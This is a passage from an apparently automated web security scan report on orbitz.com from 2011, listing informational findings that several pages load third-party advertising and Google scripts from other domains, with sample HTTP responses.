http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&

Request

Response

18.814. http://www.orbitz.com/App/PrepareActivitiesHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareActivitiesHome

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.815. http://www.orbitz.com/App/PrepareDealsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareDealsHome

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.816. http://www.orbitz.com/App/PrepareFlightsTab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.817. http://www.orbitz.com/App/PrepareSearchResult previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareSearchResult

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=1B30AACC6B4556110C9686DE7436274A; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:52 GMT
Content-Length: 175717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113158&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

18.818. http://www.orbitz.com/App/PrepareVacationsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareVacationsHome

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=package&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=120&rotator=module&width=519&adType=script&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.819. http://www.orbitz.com/App/Sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Sitemap

Issue detail

The response dynamically includes the following script from another domain:

http://www.revresda.com/js.ng/channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&

Request

Response

18.820. http://www.orbitz.com/App/SubmitQuickSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/SubmitQuickSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.821. http://www.orbitz.com/App/ViewRSSHelpPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRSSHelpPage

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&

Request

Response

18.822. http://www.orbitz.com/App/ViewRSSHelpPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRSSHelpPage

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&height=60&width=468&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=3014391A48731794845241F259558EBE; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 19:27:25 GMT
Content-Length: 77348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
/channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&height=60&width=468&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&height=60&width=468&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&"></script>
...[SNIP]...
